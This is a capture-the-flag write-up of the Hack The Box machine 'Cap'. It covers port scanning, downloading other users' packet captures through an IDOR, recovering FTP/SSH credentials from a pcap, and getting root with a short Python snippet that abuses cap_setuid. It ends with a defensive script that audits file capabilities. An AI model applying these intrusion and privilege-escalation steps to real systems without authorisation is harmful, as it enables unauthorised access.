Box Info
  • Name: Cap
  • OS: Linux
  • Difficulty: Easy
  • IP: 10.10.10.245
  • Points: 20
  • Machine Creator: InfoSecJack

Introduction

Cap is a fun box where we find a Flask web app that lets us download network logs (pcap files), in which we find FTP and SSH credentials for the user nathan.

The box has a Python binary with the cap_setuid capability, which lets us get a root shell by setting the UID to 0.


Reconnaissance

Masscan results

Masscan found 3 open ports.

sudo masscan "10.10.10.245" -p1-65535,U:1-65535 --rate=500 -e tun0

Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2021-06-19 14:47:10 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 21/tcp on 10.10.10.245
Discovered open port 80/tcp on 10.10.10.245
Discovered open port 22/tcp on 10.10.10.245

NMAP Scan results

We then feed the ports we got from masscan into nmap. These are ports 21 (ftp), 22 (ssh) and 80 (http).

sudo nmap -sC -sV -oN 10.10.10.245 10.10.10.245 -p 21,80,22

# Nmap 7.80 scan initiated Sat Jun 19 14:46:38 2021 as: nmap -sC -sV -oA nmap 10.10.10.245
Nmap scan report for 10.10.10.245
Host is up (0.20s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    gunicorn

<-- Removed a few lines here, as they were of no use -->

Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jun 19 14:49:15 2021 -- 1 IP address (1 host up) scanned in 156.80 seconds

So we have:

  • An FTP server running on port 21.
  • An SSH server running on port 22, on Ubuntu Linux.
  • A gunicorn web server running on port 80, which means we have a Python application, possibly Flask/Django (hint: as mentioned in the tweet for Cap's launch).

Foothold

As FTP is enabled, we try to log in as anonymous FTP with the credentials:
username: anonymous | password: anonymous

But that does not work.

Next, we head over to the web server running at http://cap.htb:80/.

Here we have a dashboard for the user "Nathan", nothing functional though.

The dashboard has 3 URLs:

- /a         => gives an overview of 'Security Events', 'Failed Login Attempts' and 'Port Scans (Unique IPs)' in the last 24 hrs
- /capture   => gives an XX.pcap file containing packet capture data, probably from `tcpdump`
  - /data/XX (XX is a 2-digit number)
- /ip        => gives `ipconfig` output
- /netstat   => gives `netstat` output

The /capture endpoint redirects to /data/XX (XX is a 2-digit number), from which we can download the XX.pcap file.

But here is the catch: we can visit any valid /data/ path and download the corresponding .pcap file, not just our own. This is an IDOR!

We visit http://cap.htb:80/data/0 and download the 0.pcap file.

Then we open it up with Wireshark.

We see that an FTP login succeeds with the credentials:

✅ FTP user: nathan | pass: Buck██████0RM3!

With these we get access to FTP and also the user.txt flag.

Another thing: we can also log in to this box via SSH, as the same credentials (used for the FTP login) are valid!!

So we log in via SSH for further enumeration using ssh nathan@cap.htb


Privilege Escalation

To get root we run sudo -l, but we get absolutely nothing!

We upload LinEnum.sh on the box, and run it.

We get an interesting result. (Hint: this was also a sub-tweet on Cap's tweet)

  • Specifically, cap_setuid is important here!
  • It allows arbitrary manipulation of process UIDs.
  • That is, cap_setuid allows changing the UID (user ID) of the process.

We can now set the UID to 0, which means we can run our commands as the superuser.

We already know that this box has Python installed, as there is a Flask app running on port 80.

Thus, we run the following commands to get a root session, and the root.txt flag.

import os
os.setuid(0)            # allowed because the python binary carries cap_setuid
os.system("/bin/bash")  # spawn a shell as UID 0

And we are root!!
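To close from the defender's side, an added example (not from the original writeup) of auditing the finding that LinEnum surfaced: decode the raw `security.capability` extended attribute that `getcap` reads (layout from the kernel's struct vfs_cap_data) and walk a directory for binaries carrying capabilities such as cap_setuid. The /usr/bin path and the watch list of dangerous capabilities are assumptions.

```python
import os
import struct
# Capability bit numbers, in order, as in linux/capability.h (bit 7 is cap_setuid).
CAP_NAMES = [
    "cap_chown", "cap_dac_override", "cap_dac_read_search", "cap_fowner", "cap_fsetid",
    "cap_kill", "cap_setgid", "cap_setuid", "cap_setpcap", "cap_linux_immutable",
    "cap_net_bind_service", "cap_net_broadcast", "cap_net_admin", "cap_net_raw",
    "cap_ipc_lock", "cap_ipc_owner", "cap_sys_module", "cap_sys_rawio", "cap_sys_chroot",
    "cap_sys_ptrace", "cap_sys_pacct", "cap_sys_admin", "cap_sys_boot", "cap_sys_nice",
    "cap_sys_resource", "cap_sys_time", "cap_sys_tty_config", "cap_mknod", "cap_lease",
    "cap_audit_write", "cap_audit_control", "cap_setfcap", "cap_mac_override",
    "cap_mac_admin", "cap_syslog", "cap_wake_alarm", "cap_block_suspend", "cap_audit_read",
    "cap_perfmon", "cap_bpf", "cap_checkpoint_restore",
]
VFS_CAP_FLAGS_EFFECTIVE = 0x000001  # the "+e" flag: permitted caps become effective at exec
VFS_CAP_REVISION_MASK = 0xFF000000  # revision 1 stores one u32 pair, revisions 2/3 store two

def decode_vfs_cap(blob):
    """Decode a raw security.capability xattr into (permitted, inheritable, effective) name sets."""
    magic = struct.unpack_from("<I", blob, 0)[0]
    pairs = {0x01000000: 1, 0x02000000: 2, 0x03000000: 2}.get(magic & VFS_CAP_REVISION_MASK)
    if pairs is None:
        raise ValueError("unknown vfs_cap_data revision in magic 0x%08x" % magic)
    words = struct.unpack_from("<%dI" % (2 * pairs), blob, 4)  # [perm_lo, inh_lo, perm_hi, inh_hi]
    permitted = sum(words[2 * i] << (32 * i) for i in range(pairs))
    inheritable = sum(words[2 * i + 1] << (32 * i) for i in range(pairs))
    names = lambda mask: {n for b, n in enumerate(CAP_NAMES) if mask >> b & 1}
    # File caps carry no per-bit effective set: the flag makes every permitted cap effective.
    effective = names(permitted) if magic & VFS_CAP_FLAGS_EFFECTIVE else set()
    return names(permitted), names(inheritable), effective

def find_capable_binaries(root, watch=("cap_setuid", "cap_setgid", "cap_dac_override", "cap_sys_admin")):
    """Walk `root` (Linux only) and return [(path, sorted permitted caps)] for files whose caps hit `watch`."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                blob = os.getxattr(path, "security.capability", follow_symlinks=False)
            except OSError:  # no xattr on this file, or not readable by us
                continue
            permitted, _, _ = decode_vfs_cap(blob)
            if permitted & set(watch):
                hits.append((path, sorted(permitted)))
    return hits

if __name__ == "__main__":
    for path, caps in find_capable_binaries("/usr/bin"):  # same ground LinEnum and `getcap -r` cover
        print(path, " ".join(caps))
```

A hit like `/usr/bin/python3.8 cap_setuid` is exactly the condition the privilege escalation above relies on; `setcap -r <binary>` removes it.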